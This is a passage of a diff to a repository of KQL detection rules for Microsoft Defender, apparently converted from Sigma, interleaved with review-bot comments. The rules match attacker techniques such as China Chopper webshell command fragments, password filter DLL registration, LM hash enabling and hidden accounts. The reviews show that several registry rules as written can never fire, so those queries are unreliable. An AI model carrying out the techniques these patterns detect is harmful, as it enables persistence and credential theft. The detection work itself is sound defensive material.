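Review bot: Same dead-match problem as the other registry rules in this patch: `DWORD (0x00000001)` is the Sysmon `Details` rendering, while DeviceRegistryEvents reports DWORD data as the decimal string `1`, and the value name `DisallowRun` is carried in `RegistryValueName` rather than at the end of `RegistryKey`. As written neither side of the `and` can be true for a Defender event. Suggest `RegistryKey endswith "\\CurrentVersion\\Policies\\Explorer" and RegistryValueName =~ "DisallowRun" and RegistryValueData =~ "1"`.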
@@ -1,12 +1,12 @@
-// Title: Allow RDP Remote Assistance Feature
-// Author: frack113
-// Date: 2022-08-19
-// Level: medium
-// Description: Detect enable rdp feature to allow specific user to rdp connect on the targeted machine
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.t1112
-// False Positives:
-// - Legitimate use of the feature (alerts should be investigated either way)
-
-DeviceRegistryEvents
+// Title: Allow RDP Remote Assistance Feature
+// Author: frack113
+// Date: 2022-08-19
+// Level: medium
+// Description: Detect enable rdp feature to allow specific user to rdp connect on the targeted machine
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+// False Positives:
+// - Legitimate use of the feature (alerts should be investigated either way)
+
+DeviceRegistryEvents
 | where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "System\\CurrentControlSet\\Control\\Terminal Server\\fAllowToGetHelp"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/change_the_fax_dll.kql b/KQL/rules/Persistence/change_the_fax_dll.kql
index 1ed01153..5ad43122 100644
--- a/KQL/rules/Persistence/change_the_fax_dll.kql
+++ b/KQL/rules/Persistence/change_the_fax_dll.kql
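Review bot: The `| where` clause cannot match a DeviceRegistryEvents row: `fAllowToGetHelp` is a value name, which Defender reports in `RegistryValueName` while `RegistryKey` ends at `...\Terminal Server`, and the DWORD comparison `"DWORD (0x00000001)"` is the Sysmon rendering rather than the decimal string Defender emits. Suggest `RegistryKey endswith "\\Control\\Terminal Server" and RegistryValueName =~ "fAllowToGetHelp" and RegistryValueData =~ "1"`. The header's advice that alerts should be investigated either way only helps once the rule can actually produce them.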
@@ -1,10 +1,10 @@
-// Title: Change the Fax Dll
-// Author: frack113
-// Date: 2022-07-17
-// Level: high
-// Description: Detect possible persistence using Fax DLL load when service restart
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.t1112
-
-DeviceRegistryEvents
+// Title: Change the Fax Dll
+// Author: frack113
+// Date: 2022-07-17
+// Level: high
+// Description: Detect possible persistence using Fax DLL load when service restart
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceRegistryEvents
 | where (RegistryKey endswith "\\Software\\Microsoft\\Fax\\Device Providers*" and RegistryKey contains "\\ImageName") and (not(RegistryValueData =~ "%systemroot%\\system32\\fxst30.dll"))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/change_user_account_associated_with_the_fax_service.kql b/KQL/rules/Persistence/change_user_account_associated_with_the_fax_service.kql
index 0a510014..cd03cc49 100644
--- a/KQL/rules/Persistence/change_user_account_associated_with_the_fax_service.kql
+++ b/KQL/rules/Persistence/change_user_account_associated_with_the_fax_service.kql
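Review bot: The wildcard from the source rule was emitted as a literal character: `RegistryKey endswith "\\Software\\Microsoft\\Fax\\Device Providers*"` requires the key path to end in an asterisk, and the following `RegistryKey contains "\\ImageName"` names a value that DeviceRegistryEvents reports in `RegistryValueName`, so a `Level: high` rule never fires. Suggest `RegistryKey contains "\\Software\\Microsoft\\Fax\\Device Providers\\" and RegistryValueName =~ "ImageName"`, keeping the `not(RegistryValueData =~ "%systemroot%\\system32\\fxst30.dll")` exclusion unchanged. clickonce_trust_prompt_tampering.kql in this same patch shows the same literal `*`, which points at the backend's wildcard handling rather than this one file.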
@@ -1,10 +1,10 @@
-// Title: Change User Account Associated with the FAX Service
-// Author: frack113
-// Date: 2022-07-17
-// Level: high
-// Description: Detect change of the user account associated with the FAX service to avoid the escalation problem.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.t1112
-
-DeviceRegistryEvents
+// Title: Change User Account Associated with the FAX Service
+// Author: frack113
+// Date: 2022-07-17
+// Level: high
+// Description: Detect change of the user account associated with the FAX service to avoid the escalation problem.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceRegistryEvents
 | where RegistryKey =~ "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Services\\Fax\\ObjectName" and (not(RegistryValueData contains "NetworkService"))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/chopper_webshell_process_pattern.kql b/KQL/rules/Persistence/chopper_webshell_process_pattern.kql
index c9f272f5..a9c4a33c 100644
--- a/KQL/rules/Persistence/chopper_webshell_process_pattern.kql
+++ b/KQL/rules/Persistence/chopper_webshell_process_pattern.kql
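Review bot: `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet001\Services\Fax\ObjectName` is not a key path that exists on Windows — the SYSTEM hive has `CurrentControlSet` and the numbered `ControlSet001`, not a fusion of the two — and the `ObjectName` value name is reported by DeviceRegistryEvents in `RegistryValueName`, so this exact `=~` comparison never succeeds. Suggest `RegistryKey endswith "\\Services\\Fax" and RegistryValueName =~ "ObjectName" and not(RegistryValueData contains "NetworkService")`, which also covers writes made through either control-set alias. If the odd key name is inherited from the upstream rule rather than introduced by the converter, it is still worth correcting here because the exact match makes it fatal.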
@@ -1,10 +1,10 @@
-// Title: Chopper Webshell Process Pattern
-// Author: Florian Roth (Nextron Systems), MSTI (query)
-// Date: 2022-10-01
-// Level: high
-// Description: Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.discovery, attack.t1505.003, attack.t1018, attack.t1033, attack.t1087
-
-DeviceProcessEvents
+// Title: Chopper Webshell Process Pattern
+// Author: Florian Roth (Nextron Systems), MSTI (query)
+// Date: 2022-10-01
+// Level: high
+// Description: Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.discovery, attack.t1505.003, attack.t1018, attack.t1033, attack.t1087
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "&ipconfig&echo" or ProcessCommandLine contains "&quser&echo" or ProcessCommandLine contains "&whoami&echo" or ProcessCommandLine contains "&c:&echo" or ProcessCommandLine contains "&cd&echo" or ProcessCommandLine contains "&dir&echo" or ProcessCommandLine contains "&echo [E]" or ProcessCommandLine contains "&echo [S]") and (FolderPath endswith "\\w3wp.exe" or InitiatingProcessFolderPath endswith "\\w3wp.exe")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/chromium_browser_instance_executed_with_custom_extension.kql b/KQL/rules/Persistence/chromium_browser_instance_executed_with_custom_extension.kql
index e9c0a017..5d987340 100644
--- a/KQL/rules/Persistence/chromium_browser_instance_executed_with_custom_extension.kql
+++ b/KQL/rules/Persistence/chromium_browser_instance_executed_with_custom_extension.kql
@@ -1,12 +1,12 @@
-// Title: Chromium Browser Instance Executed With Custom Extension
-// Author: Aedan Russell, frack113, X__Junior (Nextron Systems)
-// Date: 2022-06-19
-// Level: medium
-// Description: Detects a Chromium based browser process with the 'load-extension' flag to start a instance with a custom extension
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.t1176.001
-// False Positives:
-// - Usage of Chrome Extensions in testing tools such as BurpSuite will trigger this alert
-
-DeviceProcessEvents
+// Title: Chromium Browser Instance Executed With Custom Extension
+// Author: Aedan Russell, frack113, X__Junior (Nextron Systems)
+// Date: 2022-06-19
+// Level: medium
+// Description: Detects a Chromium based browser process with the 'load-extension' flag to start a instance with a custom extension
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1176.001
+// False Positives:
+// - Usage of Chrome Extensions in testing tools such as BurpSuite will trigger this alert
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "--load-extension=" and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\vivaldi.exe")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/clickonce_trust_prompt_tampering.kql b/KQL/rules/Persistence/clickonce_trust_prompt_tampering.kql
index 474eef12..e2d1d762 100644
--- a/KQL/rules/Persistence/clickonce_trust_prompt_tampering.kql
+++ b/KQL/rules/Persistence/clickonce_trust_prompt_tampering.kql
@@ -1,12 +1,12 @@
-// Title: ClickOnce Trust Prompt Tampering
-// Author: @SerkinValery, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-06-12
-// Level: medium
-// Description: Detects changes to the ClickOnce trust prompt registry key in order to enable an installation from different locations such as the Internet.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.t1112
-// False Positives:
-// - Legitimate internal requirements.
-
-DeviceRegistryEvents
+// Title: ClickOnce Trust Prompt Tampering
+// Author: @SerkinValery, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-12
+// Level: medium
+// Description: Detects changes to the ClickOnce trust prompt registry key in order to enable an installation from different locations such as the Internet.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+// False Positives:
+// - Legitimate internal requirements.
+
+DeviceRegistryEvents
 | where RegistryValueData =~ "Enabled" and RegistryKey endswith "\\SOFTWARE\\MICROSOFT\\.NETFramework\\Security\\TrustManager\\PromptingLevel*" and (RegistryKey endswith "\\Internet" or RegistryKey endswith "\\LocalIntranet" or RegistryKey endswith "\\MyComputer" or RegistryKey endswith "\\TrustedSites" or RegistryKey endswith "\\UntrustedSites")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/com_hijack_via_sdclt.kql b/KQL/rules/Persistence/com_hijack_via_sdclt.kql
index b08432c8..548e999a 100644
--- a/KQL/rules/Persistence/com_hijack_via_sdclt.kql
+++ b/KQL/rules/Persistence/com_hijack_via_sdclt.kql
@@ -1,10 +1,10 @@
-// Title: COM Hijack via Sdclt
-// Author: Omkar Gudhate
-// Date: 2020-09-27
-// Level: high
-// Description: Detects changes to 'HKCU\Software\Classes\Folder\shell\open\command\DelegateExecute'
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1546, attack.t1548
-
-DeviceRegistryEvents
+// Title: COM Hijack via Sdclt
+// Author: Omkar Gudhate
+// Date: 2020-09-27
+// Level: high
+// Description: Detects changes to 'HKCU\Software\Classes\Folder\shell\open\command\DelegateExecute'
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1546, attack.t1548
+
+DeviceRegistryEvents
 | where RegistryKey contains "\\Software\\Classes\\Folder\\shell\\open\\command\\DelegateExecute"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/communication_to_uncommon_destination_ports.kql b/KQL/rules/Persistence/communication_to_uncommon_destination_ports.kql
index 191ccce8..bffd61f0 100644
--- a/KQL/rules/Persistence/communication_to_uncommon_destination_ports.kql
+++ b/KQL/rules/Persistence/communication_to_uncommon_destination_ports.kql
@@ -1,10 +1,10 @@
-// Title: Communication To Uncommon Destination Ports
-// Author: Florian Roth (Nextron Systems)
-// Date: 2017-03-19
-// Level: medium
-// Description: Detects programs that connect to uncommon destination ports
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.command-and-control, attack.t1571
-
-DeviceNetworkEvents
+// Title: Communication To Uncommon Destination Ports
+// Author: Florian Roth (Nextron Systems)
+// Date: 2017-03-19
+// Level: medium
+// Description: Detects programs that connect to uncommon destination ports
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.command-and-control, attack.t1571
+
+DeviceNetworkEvents
 | where (RemotePort in~ ("8080", "8888")) and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")))) and (not((InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\")))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/crashcontrol_crashdump_disabled.kql b/KQL/rules/Persistence/crashcontrol_crashdump_disabled.kql
index 17b2e4c6..4ee20b56 100644
--- a/KQL/rules/Persistence/crashcontrol_crashdump_disabled.kql
+++ b/KQL/rules/Persistence/crashcontrol_crashdump_disabled.kql
@@ -1,12 +1,12 @@
-// Title: CrashControl CrashDump Disabled
-// Author: Tobias Michalski (Nextron Systems)
-// Date: 2022-02-24
-// Level: medium
-// Description: Detects disabling the CrashDump per registry (as used by HermeticWiper)
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.t1564, attack.t1112
-// False Positives:
-// - Legitimate disabling of crashdumps
-
-DeviceRegistryEvents
+// Title: CrashControl CrashDump Disabled
+// Author: Tobias Michalski (Nextron Systems)
+// Date: 2022-02-24
+// Level: medium
+// Description: Detects disabling the CrashDump per registry (as used by HermeticWiper)
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1564, attack.t1112
+// False Positives:
+// - Legitimate disabling of crashdumps
+
+DeviceRegistryEvents
 | where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "SYSTEM\\CurrentControlSet\\Control\\CrashControl"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/creation_of_a_local_hidden_user_account_by_registry.kql b/KQL/rules/Persistence/creation_of_a_local_hidden_user_account_by_registry.kql
index 318b3b95..a2864eb6 100644
--- a/KQL/rules/Persistence/creation_of_a_local_hidden_user_account_by_registry.kql
+++ b/KQL/rules/Persistence/creation_of_a_local_hidden_user_account_by_registry.kql
@@ -1,10 +1,10 @@
-// Title: Creation of a Local Hidden User Account by Registry
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021-05-03
-// Level: high
-// Description: Sysmon registry detection of a local hidden user account.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.t1136.001
-
-DeviceRegistryEvents
+// Title: Creation of a Local Hidden User Account by Registry
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-05-03
+// Level: high
+// Description: Sysmon registry detection of a local hidden user account.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1136.001
+
+DeviceRegistryEvents
 | where InitiatingProcessFolderPath endswith "\\lsass.exe" and RegistryKey endswith "\\SAM\\SAM\\Domains\\Account\\Users\\Names*" and RegistryKey endswith "$"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/creation_of_a_local_user_account.kql b/KQL/rules/Persistence/creation_of_a_local_user_account.kql
index 2d44ba9d..27c7fb62 100644
--- a/KQL/rules/Persistence/creation_of_a_local_user_account.kql
+++ b/KQL/rules/Persistence/creation_of_a_local_user_account.kql
@@ -1,12 +1,12 @@
-// Title: Creation Of A Local User Account
-// Author: Alejandro Ortuno, oscd.community
-// Date: 2020-10-06
-// Level: low
-// Description: Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.
-// MITRE Tactic: Persistence
-// Tags: attack.t1136.001, attack.persistence
-// False Positives:
-// - Legitimate administration activities
-
-DeviceProcessEvents
+// Title: Creation Of A Local User Account
+// Author: Alejandro Ortuno, oscd.community
+// Date: 2020-10-06
+// Level: low
+// Description: Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.
+// MITRE Tactic: Persistence
+// Tags: attack.t1136.001, attack.persistence
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "create" and FolderPath endswith "/dscl") or (ProcessCommandLine contains "addUser" and FolderPath endswith "/sysadminctl")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/disable_internal_tools_or_feature_in_registry.kql b/KQL/rules/Persistence/disable_internal_tools_or_feature_in_registry.kql
index a66f52c7..71d99a50 100644
--- a/KQL/rules/Persistence/disable_internal_tools_or_feature_in_registry.kql
+++ b/KQL/rules/Persistence/disable_internal_tools_or_feature_in_registry.kql
@@ -1,12 +1,12 @@
-// Title: Disable Internal Tools or Feature in Registry
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems), CrimpSec
-// Date: 2022-03-18
-// Level: medium
-// Description: Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique)
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.t1112
-// False Positives:
-// - Legitimate admin script
-
-DeviceRegistryEvents
+// Title: Disable Internal Tools or Feature in Registry
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems), CrimpSec
+// Date: 2022-03-18
+// Level: medium
+// Description: Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique)
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+// False Positives:
+// - Legitimate admin script
+
+DeviceRegistryEvents
 | where (RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\ConsentPromptBehaviorAdmin" or RegistryKey endswith "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\InactivityTimeoutSecs" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\shutdownwithoutlogon" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PushNotifications\\ToastEnabled" or RegistryKey endswith "SYSTEM\\CurrentControlSet\\Control\\Storage\\Write Protection" or RegistryKey endswith "SYSTEM\\CurrentControlSet\\Control\\StorageDevicePolicies\\WriteProtect")) or (RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisableCMD" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoControlPanel" or RegistryKey endswith 
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\StartMenuLogOff" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableChangePassword" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableLockWorkstation" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableTaskmgr" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\NoDispBackgroundPage" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\NoDispCPL" or RegistryKey endswith "SOFTWARE\\Policies\\Microsoft\\Windows\\Explorer\\DisableNotificationCenter" or RegistryKey endswith "SOFTWARE\\Policies\\Microsoft\\Windows\\System\\DisableCMD"))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/disable_windows_security_center_notifications.kql b/KQL/rules/Persistence/disable_windows_security_center_notifications.kql
index e05e5ac6..a925bbff 100644
--- a/KQL/rules/Persistence/disable_windows_security_center_notifications.kql
+++ b/KQL/rules/Persistence/disable_windows_security_center_notifications.kql
@@ -1,10 +1,10 @@
-// Title: Disable Windows Security Center Notifications
-// Author: frack113
-// Date: 2022-08-19
-// Level: medium
-// Description: Detect set UseActionCenterExperience to 0 to disable the Windows security center notification
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.t1112
-
-DeviceRegistryEvents
+// Title: Disable Windows Security Center Notifications
+// Author: frack113
+// Date: 2022-08-19
+// Level: medium
+// Description: Detect set UseActionCenterExperience to 0 to disable the Windows security center notification
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceRegistryEvents
 | where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "Windows\\CurrentVersion\\ImmersiveShell\\UseActionCenterExperience"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/dll_search_order_hijackig_via_additional_space_in_path.kql b/KQL/rules/Persistence/dll_search_order_hijackig_via_additional_space_in_path.kql
index 1cff4d81..262ff091 100644
--- a/KQL/rules/Persistence/dll_search_order_hijackig_via_additional_space_in_path.kql
+++ b/KQL/rules/Persistence/dll_search_order_hijackig_via_additional_space_in_path.kql
@@ -1,11 +1,11 @@
-// Title: DLL Search Order Hijackig Via Additional Space in Path
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-07-30
-// Level: high
-// Description: Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...)
-// but with a space in order to trick DLL load search order and perform a "DLL Search Order Hijacking" attack
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.privilege-escalation, attack.defense-evasion, attack.t1574.001
-
-DeviceFileEvents
+// Title: DLL Search Order Hijackig Via Additional Space in Path
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-30
+// Level: high
+// Description: Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...)
+// but with a space in order to trick DLL load search order and perform a "DLL Search Order Hijacking" attack
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.defense-evasion, attack.t1574.001
+
+DeviceFileEvents
 | where FolderPath endswith ".dll" and (FolderPath startswith "C:\\Windows \\" or FolderPath startswith "C:\\Program Files \\" or FolderPath startswith "C:\\Program Files (x86) \\")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/dns_over_https_enabled_by_registry.kql b/KQL/rules/Persistence/dns_over_https_enabled_by_registry.kql
index 3ac845dc..941e415c 100644
--- a/KQL/rules/Persistence/dns_over_https_enabled_by_registry.kql
+++ b/KQL/rules/Persistence/dns_over_https_enabled_by_registry.kql
@@ -1,14 +1,14 @@
-// Title: DNS-over-HTTPS Enabled by Registry
-// Author: Austin Songer
-// Date: 2021-07-22
-// Level: medium
-// Description: Detects when a user enables DNS-over-HTTPS.
-// This can be used to hide internet activity or be used to hide the process of exfiltrating data.
-// With this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.t1140, attack.t1112
-// False Positives:
-// - Unlikely
-
-DeviceRegistryEvents
+// Title: DNS-over-HTTPS Enabled by Registry
+// Author: Austin Songer
+// Date: 2021-07-22
+// Level: medium
+// Description: Detects when a user enables DNS-over-HTTPS.
+// This can be used to hide internet activity or be used to hide the process of exfiltrating data.
+// With this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1140, attack.t1112
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
 | where (RegistryValueData =~ "secure" and RegistryKey endswith "\\SOFTWARE\\Google\\Chrome\\DnsOverHttpsMode") or (RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\Edge\\BuiltInDnsClientEnabled") or (RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\SOFTWARE\\Policies\\Mozilla\\Firefox\\DNSOverHTTPS\\Enabled")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/dropping_of_password_filter_dll.kql b/KQL/rules/Persistence/dropping_of_password_filter_dll.kql
index 9ab99016..f6cb2abe 100644
--- a/KQL/rules/Persistence/dropping_of_password_filter_dll.kql
+++ b/KQL/rules/Persistence/dropping_of_password_filter_dll.kql
@@ -1,10 +1,10 @@
-// Title: Dropping Of Password Filter DLL
-// Author: Sreeman
-// Date: 2020-10-29
-// Level: medium
-// Description: Detects dropping of dll files in system32 that may be used to retrieve user credentials from LSASS
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.credential-access, attack.t1556.002
-
-DeviceProcessEvents
+// Title: Dropping Of Password Filter DLL
+// Author: Sreeman
+// Date: 2020-10-29
+// Level: medium
+// Description: Detects dropping of dll files in system32 that may be used to retrieve user credentials from LSASS
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.credential-access, attack.t1556.002
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa" and ProcessCommandLine contains "scecli\\0" and ProcessCommandLine contains "reg add"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/enable_lm_hash_storage.kql b/KQL/rules/Persistence/enable_lm_hash_storage.kql
index 4a343b3f..92e70a89 100644
--- a/KQL/rules/Persistence/enable_lm_hash_storage.kql
+++ b/KQL/rules/Persistence/enable_lm_hash_storage.kql
@@ -1,11 +1,11 @@
-// Title: Enable LM Hash Storage
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-12-15
-// Level: high
-// Description: Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes.
-// By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.t1112
-
-DeviceRegistryEvents
+// Title: Enable LM Hash Storage
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-12-15
+// Level: high
+// Description: Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes.
+// By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceRegistryEvents
 | where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "System\\CurrentControlSet\\Control\\Lsa\\NoLMHash"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/enable_lm_hash_storage_proccreation.kql b/KQL/rules/Persistence/enable_lm_hash_storage_proccreation.kql
index 7bc80978..bbd19baf 100644
--- a/KQL/rules/Persistence/enable_lm_hash_storage_proccreation.kql
+++ b/KQL/rules/Persistence/enable_lm_hash_storage_proccreation.kql
@@ -1,11 +1,11 @@
-// Title: Enable LM Hash Storage - ProcCreation
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-12-15
-// Level: high
-// Description: Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes.
-// By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.t1112
-
-DeviceProcessEvents
+// Title: Enable LM Hash Storage - ProcCreation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-12-15
+// Level: high
+// Description: Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes.
+// By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "\\System\\CurrentControlSet\\Control\\Lsa" and ProcessCommandLine contains "NoLMHash" and ProcessCommandLine contains " 0"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/enabling_cor_profiler_environment_variables.kql b/KQL/rules/Persistence/enabling_cor_profiler_environment_variables.kql
index cae96f9e..09982deb 100644
--- a/KQL/rules/Persistence/enabling_cor_profiler_environment_variables.kql
+++ b/KQL/rules/Persistence/enabling_cor_profiler_environment_variables.kql
@@ -1,10 +1,10 @@
-// Title: Enabling COR Profiler Environment Variables
-// Author: Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research), Jimmy Bayne (@bohops)
-// Date: 2020-09-10
-// Level: medium
-// Description: Detects .NET Framework CLR and .NET Core CLR "cor_enable_profiling" and "cor_profiler" variables being set and configured.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.privilege-escalation, attack.defense-evasion, attack.t1574.012
-
-DeviceRegistryEvents
+// Title: Enabling COR Profiler Environment Variables
+// Author: Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research), Jimmy Bayne (@bohops)
+// Date: 2020-09-10
+// Level: medium
+// Description: Detects .NET Framework CLR and .NET Core CLR "cor_enable_profiling" and "cor_profiler" variables being set and configured.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.defense-evasion, attack.t1574.012
+
+DeviceRegistryEvents
 | where (RegistryKey endswith "\\COR_ENABLE_PROFILING" or RegistryKey endswith "\\COR_PROFILER" or RegistryKey endswith "\\CORECLR_ENABLE_PROFILING") or RegistryKey contains "\\CORECLR_PROFILER_PATH"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/esxi_account_creation_via_esxcli.kql b/KQL/rules/Persistence/esxi_account_creation_via_esxcli.kql
index 0199040b..b85224c5 100644
--- a/KQL/rules/Persistence/esxi_account_creation_via_esxcli.kql
+++ b/KQL/rules/Persistence/esxi_account_creation_via_esxcli.kql
@@ -1,12 +1,12 @@
-// Title: ESXi Account Creation Via ESXCLI
-// Author: Cedric Maurugeon
-// Date: 2023-08-22
-// Level: medium
-// Description: Detects user account creation on ESXi system via esxcli
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.execution, attack.t1136, attack.t1059.012
-// False Positives:
